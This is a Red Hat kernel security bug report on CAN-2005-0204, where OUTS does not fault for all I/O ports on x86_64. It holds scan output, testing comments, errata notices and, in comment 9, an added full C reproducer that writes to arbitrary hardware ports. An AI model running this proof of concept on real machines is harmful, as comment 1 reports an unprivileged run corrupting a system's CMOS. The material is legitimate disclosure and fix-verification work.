Bug 148855 - CAN-2005-0204 OUTS instruction does not cause SIGSEGV for all ports
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 3
Classification: Red Hat
Component: kernel
3.0
x86_64 Linux
Priority: medium   Severity: high
Assigned To: Ernie Petrides
Brian Brock
public=20050126,impact=important
: Security
 
Reported: 2005-02-16 07:34 EST by Mark J. Cox (Product Security)
Modified: 2007-11-30 17:07 EST

Doc Type: Bug Fix
Last Closed: 2005-04-22 16:17:35 EDT


Attachments (Terms of Use)
RHEL3 x86_64 reproducer (799 bytes, text/plain)
2005-04-08 20:46 EDT, Ernie Petrides

Description Mark J. Cox (Product Security) 2005-02-16 07:34:31 EST
Verified as affecting RHEL3 (also can result in DoS)

*** This bug has been split off bug 146244 ***

------- Original comment by Staffan Larsen on 2005.01.26 08:28 -------

From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0

Description of problem:
Compile the attached program on x86

Run on x86 - it should not print anything. This behaviour is correct.

Run (the same binary) on x86_64 - it prints out a number of port
values for which the OUTS instruction did not cause a SIGSEGV. This
behaviour is not correct.

Version-Release number of selected component (if applicable):
Linux version 2.6.9-1.906_ELsmp (bhcompile@dolly.build.redhat.com)
(gcc version 3.4.3 20041125 (Red Hat 3.4.3-6.EL4)) #1 SMP Sun Dec 12
23:05:02 EST 2004

How reproducible:
Always

Steps to Reproduce:
1. Compile program on x86

A. 
2. Run on x86

B.
2. Run on x86_64


    

Actual Results:  A.
<nothing>

B.
didn't get signal for port=440
didn't get signal for port=441
didn't get signal for port=442
didn't get signal for port=443
didn't get signal for port=444
didn't get signal for port=445
didn't get signal for port=446
didn't get signal for port=447
didn't get signal for port=448
didn't get signal for port=449
didn't get signal for port=44a
didn't get signal for port=44b
didn't get signal for port=44c
didn't get signal for port=44d
didn't get signal for port=44e
didn't get signal for port=44f
didn't get signal for port=450
didn't get signal for port=451
didn't get signal for port=452
didn't get signal for port=453
didn't get signal for port=454
didn't get signal for port=455
didn't get signal for port=456
didn't get signal for port=457
didn't get signal for port=458
didn't get signal for port=459
didn't get signal for port=45a
didn't get signal for port=45b
didn't get signal for port=45c
didn't get signal for port=45d
didn't get signal for port=45e
didn't get signal for port=45f
didn't get signal for port=460
didn't get signal for port=461
didn't get signal for port=462
didn't get signal for port=463
didn't get signal for port=464
didn't get signal for port=465
didn't get signal for port=466
didn't get signal for port=467
didn't get signal for port=468
didn't get signal for port=469
didn't get signal for port=46a
didn't get signal for port=46b
didn't get signal for port=46c
didn't get signal for port=46d
didn't get signal for port=46e
didn't get signal for port=46f
didn't get signal for port=470
didn't get signal for port=471
didn't get signal for port=472
didn't get signal for port=473
didn't get signal for port=474
didn't get signal for port=475
didn't get signal for port=476
didn't get signal for port=477
didn't get signal for port=478
didn't get signal for port=479
didn't get signal for port=47a
didn't get signal for port=47b
didn't get signal for port=47c
didn't get signal for port=47d
didn't get signal for port=47e
didn't get signal for port=47f
didn't get signal for port=480
didn't get signal for port=481
didn't get signal for port=482
didn't get signal for port=483
didn't get signal for port=484
didn't get signal for port=485
didn't get signal for port=486
didn't get signal for port=487
didn't get signal for port=488
didn't get signal for port=489
didn't get signal for port=48a
didn't get signal for port=48b
didn't get signal for port=48c
didn't get signal for port=48d
didn't get signal for port=48e
didn't get signal for port=48f
didn't get signal for port=490
didn't get signal for port=491
didn't get signal for port=492
didn't get signal for port=493
didn't get signal for port=494
didn't get signal for port=495
didn't get signal for port=496
didn't get signal for port=497
didn't get signal for port=498
didn't get signal for port=499
didn't get signal for port=49a
didn't get signal for port=49b
didn't get signal for port=49c
didn't get signal for port=49d
didn't get signal for port=49e
didn't get signal for port=49f
didn't get signal for port=4a0
didn't get signal for port=4a1
didn't get signal for port=4a2
didn't get signal for port=4a3
didn't get signal for port=4a4
didn't get signal for port=4a5
didn't get signal for port=4a6
didn't get signal for port=4a7
didn't get signal for port=4a8
didn't get signal for port=4a9
didn't get signal for port=4aa
didn't get signal for port=4ab
didn't get signal for port=4ac
didn't get signal for port=4ad
didn't get signal for port=4ae
didn't get signal for port=4af
didn't get signal for port=4b0
didn't get signal for port=4b1
didn't get signal for port=4b2
didn't get signal for port=4b3
didn't get signal for port=4b4
didn't get signal for port=4b5
didn't get signal for port=4b6
didn't get signal for port=4b7


Expected Results:  A.
<nothing>

B.
<nothing>

Additional info:
Comment 1 Mark J. Cox (Product Security) 2005-02-16 09:53:13 EST
*** Important Note *** Running the program above without modifications
allowed me as a normal user to mess up the CMOS on a dual Opteron box
Comment 2 Mark J. Cox (Product Security) 2005-02-23 07:46:27 EST
ping
Comment 3 Ernie Petrides 2005-03-08 14:59:05 EST
Mark, just for clarification, does your comment #1 reflect the results of
running the reproducer on a RHEL3-based system?

(I don't believe the results in the initial comment are relevant to RHEL3.)
Comment 4 Jim Paradis 2005-03-08 15:04:42 EST
I'm trying this out on RHEL3 right now...
Comment 5 Jim Paradis 2005-03-08 15:43:57 EST
Ernie suggested that different sizes of the IO bitmaps between RHEL3 and RHEL4
might make this not a problem on RHEL3.  I tried the reproducer and verified
that on RHEL3 it generates SEGVs for all the OUTs.  Closing this as NOTABUG.
Comment 6 Mark J. Cox (Product Security) 2005-03-08 18:56:28 EST
At home I have a RHEL3 SMP x86_64 box using a standard kernel that was
vulnerable to this exploit.  I'm away so I don't have access to this today, so I
can't tell you if it was a completely up2date kernel.  
Comment 7 Mark J. Cox (Product Security) 2005-03-16 08:10:18 EST
(with altered program to just poll port 100)

[mark@pindrop mark]$ uname -a
Linux pindrop 2.4.21-20.ELsmp #1 SMP Wed Aug 18 20:34:58 EDT 2004 x86_64 x86_64
x86_64 GNU/Linux
[mark@pindrop mark]$ ./a.out
didn't get signal for port=64
Comment 8 Ernie Petrides 2005-04-08 19:36:14 EDT
The reproducer in comment #1 of bug 146244 does not "work" on RHEL3
because access to the i/o port map is not enabled by default (as it
is in 2.6).  Thus, whatever problem Mark induced on RHEL3 must be
unrelated to this vulnerability.

I do believe that RHEL3 does have a problem on x86_64 if the i/o port
map does get enabled.  I will try to develop a revised reproducer.
Comment 9 Ernie Petrides 2005-04-08 20:46:54 EDT
Created attachment 112894 [details]
RHEL3 x86_64 reproducer

Here is a working RHEL3 reproducer.  It requires root privileges in order
to invoke a "ioperm(0L, 1L, 1);" system call, and the scanning loop needed
to be changed to start from port 1 (to avoid corrupting the port 0 enabled
by the ioperm() call).
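The reproducer itself is not shown on this page (attachment 112894 is only listed), so the following is an added example, not the attached file and not Red Hat's code. It reconstructs the scan that the description and comment 9 describe: for each port, execute a one-byte OUTS, catch the fault signal the kernel is supposed to deliver, and print the ports that went silent, in the same "didn't get signal for port=" format as the results above. Run without arguments it behaves like the original x86 program (unprivileged, every port must fault); with the assumed `--ioperm` flag it does what comment 9 describes for RHEL3, calling `ioperm(0L, 1L, 1)` as root and starting the scan at port 1 so the enabled port 0 is not written to. The function names `probe_outs` and `scan_ports` and the flag name are my own.

```c
/* outs_probe.c: reconstruction of the port-scanning reproducer discussed in
 * this bug (added example; attachment 112894 is not reproduced on this page).
 * For every port in a range it executes a one-byte OUTS (outsb) and records
 * whether the kernel delivered a fault signal.  Without an ioperm()/iopl()
 * grant every port must fault; a port reported as silent is the bug condition.
 *
 * Build:  gcc -O2 -Wall -o outs_probe outs_probe.c
 * Run:    ./outs_probe                 unprivileged, scans 0..0xffff
 *         sudo ./outs_probe --ioperm   ioperm(0,1,1), then scans 1..0xffff
 */
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__linux__) && (defined(__x86_64__) || defined(__i386__))
#include <sys/io.h>
#define HAVE_X86_PORT_IO 1
#else
#define HAVE_X86_PORT_IO 0
#endif

static sigjmp_buf fault_env;

/* A faulting OUTS raises #GP, which Linux delivers as SIGSEGV.  SIGBUS and
 * SIGILL are caught as well so that an emulator reporting the fault
 * differently still counts as "got a signal". */
static void fault_handler(int sig)
{
    (void)sig;
    siglongjmp(fault_env, 1);
}

static void install_fault_handlers(void)
{
    static int installed;
    struct sigaction sa;

    if (installed)
        return;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = fault_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS, &sa, NULL);
    sigaction(SIGILL, &sa, NULL);
    installed = 1;
}

/* Execute one OUTS byte write to `port`.
 * Returns 1 if a fault signal arrived (expected without port permission),
 *         0 if the instruction completed silently (the bug),
 *        -1 if this build has no x86 port I/O at all. */
int probe_outs(unsigned short port)
{
#if HAVE_X86_PORT_IO
    static const unsigned char zero = 0;   /* byte OUTS would write */
    const unsigned char *src = &zero;

    install_fault_handlers();
    if (sigsetjmp(fault_env, 1) != 0)
        return 1;                           /* came back from the handler */
    /* outsb: write the byte at DS:(%rsi) to the port in %dx, advance %rsi */
    __asm__ volatile ("outsb" : "+S"(src) : "d"(port) : "memory");
    return 0;
#else
    (void)port;
    return -1;
#endif
}

/* Probe every port in [first, last]; when `report` is nonzero, print each
 * silent port in the format used in the report above.  Returns the number
 * of ports that did not fault. */
int scan_ports(unsigned first, unsigned last, int report)
{
    int silent = 0;

    for (unsigned p = first; p <= last && p <= 0xffff; p++) {
        if (probe_outs((unsigned short)p) == 0) {
            silent++;
            if (report)
                printf("didn't get signal for port=%x\n", p);
        }
    }
    return silent;
}

int main(int argc, char **argv)
{
    unsigned first = 0;

    if (argc > 1 && strcmp(argv[1], "--ioperm") == 0) {
#if HAVE_X86_PORT_IO
        /* Comment 9: enable port 0 (root only) so an I/O bitmap exists, and
         * start at port 1 so the legitimately enabled port is not written. */
        if (ioperm(0L, 1L, 1) != 0) {
            perror("ioperm");
            return 1;
        }
        first = 1;
#else
        fprintf(stderr, "--ioperm needs x86 Linux\n");
        return 1;
#endif
    }
    return scan_ports(first, 0xffff, 1) ? 2 : 0;  /* nonzero if any port escaped */
}
```

On a fixed kernel the program prints nothing and exits 0 in both modes; the `--ioperm` mode exists only because, as comment 8 notes, 2.4 does not enable the I/O port map for a process until something like ioperm() is called, so the unprivileged scan cannot reach the faulty path there.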
Comment 10 Ernie Petrides 2005-04-08 21:34:03 EDT
Patch posted for review on 8-Apr-2005.
Comment 11 Ernie Petrides 2005-04-13 20:25:46 EDT
A fix for this problem has just been committed to the RHEL3 E5
patch pool this evening (in kernel version 2.4.21-27.0.3.EL).
Comment 12 Ernie Petrides 2005-04-15 21:28:15 EDT
A fix for this problem has also been committed to the RHEL3 U5
patch pool this evening (in kernel version 2.4.21-32.EL).
Comment 13 Josh Bressers 2005-04-22 16:17:35 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2005-293.html
Comment 14 Tim Powers 2005-05-18 09:29:18 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2005-294.html
